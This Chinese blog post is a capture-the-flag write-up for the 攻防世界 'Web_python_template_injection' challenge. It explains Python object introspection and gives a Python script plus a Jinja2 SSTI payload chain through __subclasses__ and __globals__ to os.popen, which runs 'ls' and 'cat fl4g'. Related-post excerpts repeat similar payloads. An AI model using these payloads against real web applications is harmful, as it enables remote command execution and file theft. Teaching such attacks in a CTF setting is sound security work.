攻防世界 WEB web_python_template_injection

最新推荐文章于 2022-05-28 20:25:00 发布
最新推荐文章于 2022-05-28 20:25:00 发布
阅读量156 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119673192
版权

这题考的是python ssti
简单来说,就是模板渲染出了问题,会把某些特定表达式里面的值当成代码处理
验证很简单{{7*7}},只要返回的是49,就表明存在ssti注入
然后这类题的基本思路就是通过object类找到eval或者os模块,从而进行系统函数调用
需要用到的魔法方法:

__class__
万物皆对象,而class用于返回该对象所属的类,比如某个字符串,他的对象为字符串对象,而其所属的类为<class 'str'>。

__bases__
以元组的形式返回一个类所直接继承的类。

__base__
以字符串返回一个类所直接继承的类。

__mro__
返回解析方法调用的顺序。

__subclasses__()
获取类的所有子类。

__init__
所有自带带类都包含init方法,便于利用他当跳板来调用globals。

__globals__
function.__globals__,用于获取function所处空间下可使用的module、方法以及所有变量。

方法就是这个方法,难得是调用链
以这题来举个例

''.__class__  #返回str类
''.__class__.__base__ #返回str类父类
''.__class__.__base__ .__subclasses__() #返回str父类basestring的儿子们
当然我们要先找到object类
''.__class__.__mro__ #mro是调用链,把类的继承关系想成一棵树,这个方法表示输出从当前节点到根节点的路径
''.__class__.__mro__[2] #调用object类
''.__class__.__mro__[2].__subclasses__() #返回object的儿子们

需要手动查找可能调用os模块的类,这就看你对python的函数熟悉程度了,可以是error,或者print之类的
我这里用print,<class ‘site._Printer’>。这里可以写个脚本,来确定<class ‘site._Printer’>的下标,不然一个个数太费劲,输出下标71

import requests
import re
s=requests.session()
for i in range(100):
    url="http://111.200.241.244:51803/{{''.__class__.__mro__[2].__subclasses__()["+str(i)+"]}}"
    response=s.get(url=url)
    if re.findall("site._Printer",response.text):
        print(i)
        break

然后''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__,可以查看site._Printer类引用的所有类和模块,查找os模块
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'] #调用os模块,然后就可以调用函数
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read() #结果显示fl4g文件就在当前目录
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read() #得到flag

参考视频链接:https://www.bilibili.com/video/BV1rq4y1Q7G1/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3505
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
攻防世界WebWeb_python_template_injection
Light_inthe_eyes的博客
10-15 91
由题目提示是Python模板注入 简单测试: SSTI的目的就是从获取的基类中找到可以利用的类。构造获取基类的payload: [].__class__.__base__.__subclasses__() 读取目录: ().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls') 读取失败,猜测可能过滤了system()函数 那就采用os模块下的listdir来读取目录: ().__class__._
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3344
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
【愚公系列】2023年05月 攻防世界-WebWeb_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
最新发布
06-01
本实验“网络攻防课程seed-labs实验-Web_SQL_Injection.zip”旨在帮助学生理解和掌握如何防止这类攻击,以及如何检测和修复已存在的漏洞。 SQL注入是一种利用网站应用程序对用户输入数据处理不当的安全漏洞,攻击者...
fake_useragent.zip
08-27
Python编程中,Fake UserAgent库是一个非常实用的工具,它允许开发者生成逼真的用户代理字符串,以模拟不同浏览器或设备访问网站。这个工具的主要作用是帮助开发人员在进行网络爬虫或者自动化测试时,避免被目标...
pythonPDF_pdf_python_
09-29
在IT行业中,Python是一种广泛应用的编程语言,尤其在数据处理和自动化任务方面表现突出。本话题聚焦于使用Python处理PDF文档,特别是如何将多页的PDF文档拆分成多个单页PDF文档。PDF(Portable Document Format)是...
网络web安全攻防技术_漏洞分析_网络攻防_网络安全_vulnerability_
09-29
常见网络安全协议工具使用方法,web安全漏洞分析、漏洞案例,web攻防思路分享。
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3672
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1070
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
攻防世界Writeup Web_python_template_injection
weixin_48876267的博客
11-17 532
访问地址 首页显示 译:python 模块注入 那就直奔主题,看其是否存在SSTI注入 111.200.241.244:63800/{{2*3}} 得到回显,存在注入 接下来查看所有模块 {{ [].__class__.__base__.__subclasses__()}} {{ {}.__class__.__base__.__subclasses__()}} {{ ().__class__.__base__.__subclasses__()}} {{ ''.__class__.__base__._.
攻防世界 Web_python_template_injection wp
weixin_45253216的博客
01-19 268
2021.1.19 今天把两个拖了很久的python模板注入做完了,感觉神清气爽! WP 进来后看到了题目的提示,python template injection,看样子是个模板注入,先测试一下。 1+1被计算成了2,并回显到页面上,说明存在模板注入,去百度一下template的注入姿势。 //调用os模块的popen执行ls打印所有文件 {{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("命令"
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3470
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
攻防世界-Web_python_template_injection
weixin_46784800的博客
11-18 2542
flask基础 SSTI:服务器端模板注入(Server-Side Template Injection) 不正确的使用flask中的render_template_string方法会引发SSTI。 SSTI文件读取/命令执行 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 思路:找到父类<type 'object'>–>寻找子类–>找关于命令执行或者文件操作的模块。 _class_ 返回类型所属的对象 _mro
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1154
好难啊
服务端模板注入漏洞SSTI
weixin_43873557的博客
02-21 400
所有用户的输入都存在风险 tempalte = "Bio:{{user.bio}}" render(template) 数据交互Bio(user对象的bio属性) 当user.bio是正常输入时,例如:Bio:{{7*7}},那就是正常的显示输入。 当user.bio是恶意输出时,例如:Bio:{{exec(‘ls’)}},就会执行系统命令。 基于python的flask web架构做一个简单的测试。 构造payload {{import os;os.system("id")}} 失败了,这是因为J
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6957
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
攻防世界web_python_template_injection
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值